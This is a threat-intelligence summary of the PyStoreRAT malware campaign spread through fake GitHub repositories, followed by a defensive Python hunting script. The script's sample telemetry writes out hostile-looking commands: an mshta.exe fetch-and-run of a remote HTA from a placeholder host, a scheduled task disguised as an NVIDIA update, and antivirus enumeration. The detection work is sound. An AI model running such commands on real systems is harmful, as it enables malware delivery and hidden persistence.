PyStoreRAT Malware Distributed via Fake GitHub Repositories
Summary
A new campaign is distributing PyStoreRAT, a modular JavaScript-based Remote Access Trojan (RAT), through GitHub repositories masquerading as OSINT tools, DeFi bots, and GPT wrappers. The malware, which deploys the Rhadamanthys information stealer as a follow-on payload, has been active since mid-June 2025. Attack chains involve loader stubs that execute a remote HTA file, leading to system profiling, privilege checks, and cryptocurrency wallet file scanning. The threat actors use social media promotion and artificial metrics inflation to lend legitimacy to the repositories.
Timeline
- 12.12.2025 20:50 (1 article)
PyStoreRAT Malware Campaign Active Since Mid-June 2025
A new campaign distributing PyStoreRAT, a modular JavaScript-based RAT, has been active since mid-June 2025. The malware is spread through GitHub repositories themed as OSINT tools, DeFi bots, and GPT wrappers. The repositories contain minimal code to download and execute a remote HTA file, leading to system profiling, privilege checks, and cryptocurrency wallet file scanning. The threat actors use social media promotion and artificial metrics inflation to lend legitimacy to the repositories.
Source:
- Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50
Information Snippets
- PyStoreRAT is a modular, multi-stage implant capable of executing various payload formats including EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA.
  First reported: 12.12.2025 20:50 (1 source, 1 article). Source: Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50
- The malware is distributed through GitHub repositories themed as development utilities or OSINT tools; each contains only minimal code whose purpose is to download a remote HTA file and execute it via 'mshta.exe'.
  First reported: 12.12.2025 20:50 (1 source, 1 article). Source: Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50
- PyStoreRAT profiles the system, checks for administrator privileges, and scans for cryptocurrency wallet-related files associated with Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02.
  First reported: 12.12.2025 20:50 (1 source, 1 article). Source: Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50
- The loader stub checks for installed antivirus products, particularly those whose name matches 'Falcon' (CrowdStrike Falcon) or 'Reason' (Cybereason or ReasonLabs), to reduce the chance of being detected by those products.
  First reported: 12.12.2025 20:50 (1 source, 1 article). Source: Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50
- Persistence is achieved by setting up a scheduled task disguised as an NVIDIA app self-update.
  First reported: 12.12.2025 20:50 (1 source, 1 article). Source: Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50
- The malware contacts an external server to fetch and execute commands, including downloading and executing payloads, extracting ZIP archives, and spreading via removable drives.
  First reported: 12.12.2025 20:50 (1 source, 1 article). Source: Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50
- The campaign has been active since mid-June 2025, with repositories promoted via social media and artificially inflated metrics.
  First reported: 12.12.2025 20:50 (1 source, 1 article). Source: Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50
- The threat actors use newly created or dormant GitHub accounts to publish repositories and slip malicious payloads in 'maintenance' commits.
  First reported: 12.12.2025 20:50 (1 source, 1 article). Source: Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50
- The presence of Russian-language artifacts suggests a likely Eastern European origin for the threat actors.
  First reported: 12.12.2025 20:50 (1 source, 1 article). Source: Fake OSINT and GPT Utility GitHub Repos Spread PyStoreRAT Malware Payloads — thehackernews.com — 12.12.2025 20:50
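Three of the behaviours listed above leave clear traces in process-creation telemetry: 'mshta.exe' launched with a remote URL, a scheduled task named after an NVIDIA self-update whose action is not NVIDIA's own binary, and enumeration of installed antivirus products before the loader decides how to proceed. The Python below is an added hunting example written for this page; it is not code from the article, from the repositories, or from the malware. The Sysmon-style sample events, the host name, the task names and the rule heuristics are constructed assumptions, and the antivirus rule assumes the check is made through WMI's root/SecurityCenter2 namespace, which the article does not state.

```python
"""Hunting rules over constructed Sysmon-style process-creation records.

The records and heuristics here are assumptions made for this example,
not indicators taken from the article."""
import re
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (the Sysmon Event ID 1 fields used here)."""
    pid: int
    parent_image: str
    image: str
    command_line: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


# Constructed sample telemetry: three events modelled on the behaviours the page
# describes, followed by two benign look-alikes that a naive rule would also flag.
SAMPLE_EVENTS = [
    ProcEvent(1100, r"C:\Program Files\nodejs\node.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://updates.example.invalid/chk.hta"),
    ProcEvent(1101, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks /Create /SC HOURLY /TN "NVIDIA App SelfUpdate" '
              r'/TR "wscript.exe C:\Users\Public\nvupd.js" /F'),
    ProcEvent(1102, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WMIC.exe",
              r"wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get displayName"),
    ProcEvent(2000, r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\ProgramData\Vendor\setup.hta"),          # local HTA, benign
    ProcEvent(2001, r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks /Create /SC DAILY /TN "NVIDIA App Update" '
              r'/TR "C:\Program Files\NVIDIA Corporation\NVIDIA app\NVIDIA app.exe --update"'),
]

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://", re.IGNORECASE)
# Assumed legitimate install roots for the vendor's own updater binary.
NVIDIA_DIRS = ("c:\\program files\\nvidia corporation\\",
               "c:\\program files (x86)\\nvidia corporation\\")
# Interpreters a self-update task has no business launching.
SCRIPT_HOSTS = {"mshta", "wscript", "cscript", "powershell", "pwsh", "cmd",
                "node", "python", "rundll32", "regsvr32"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _arg(cmd: str, flag: str) -> Optional[str]:
    """Return the value following a schtasks-style flag, honouring double quotes."""
    m = re.search(re.escape(flag) + r'\s+(?:"([^"]*)"|(\S+))', cmd, re.IGNORECASE)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def detect_remote_hta(ev: ProcEvent) -> Optional[Finding]:
    """mshta.exe handed a URL: the loader-stub behaviour described on the page."""
    if _basename(ev.image) != "mshta.exe" or not REMOTE_URL.search(ev.command_line):
        return None
    return Finding(ev.pid, "mshta_remote_hta",
                   f"mshta.exe fetching a remote HTA, spawned by {_basename(ev.parent_image)}")


def detect_fake_nvidia_task(ev: ProcEvent) -> Optional[Finding]:
    """schtasks /Create with an NVIDIA-themed name whose action is not NVIDIA's own binary."""
    if _basename(ev.image) != "schtasks.exe" or "/create" not in ev.command_line.lower():
        return None
    name = (_arg(ev.command_line, "/tn") or "").lower()
    action = (_arg(ev.command_line, "/tr") or "").strip().lower()
    if "nvidia" not in name:
        return None
    # First token is enough to spot a script host; paths with spaces are covered
    # by the install-directory check instead.
    launcher = _basename(action.split()[0]) if action else ""
    if launcher.split(".")[0] in SCRIPT_HOSTS or not action.startswith(NVIDIA_DIRS):
        return Finding(ev.pid, "fake_nvidia_task", f"task {name!r} runs {action!r}")
    return None


def detect_av_enum(ev: ProcEvent) -> Optional[Finding]:
    """Enumeration of registered AV products via WMI/CIM (root/SecurityCenter2)."""
    cmd = ev.command_line.lower()
    if "securitycenter2" in cmd and "antivirusproduct" in cmd:
        return Finding(ev.pid, "av_product_enumeration", "queried AntiVirusProduct")
    return None


RULES = (detect_remote_hta, detect_fake_nvidia_task, detect_av_enum)


def hunt(events: Iterable[ProcEvent]) -> list[Finding]:
    """Apply every rule to every event; each event yields at most one finding per rule."""
    return [f for ev in events for rule in RULES if (f := rule(ev)) is not None]


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"pid={f.pid} rule={f.rule}: {f.detail}")
```

Running the script reports findings for the three modelled events only. The task rule deliberately tolerates NVIDIA's real updater under its install directory, and the antivirus-enumeration rule is weak on its own because administrative tooling issues the same query; treat it as context that raises the priority of the other two hits rather than as a stand-alone alert.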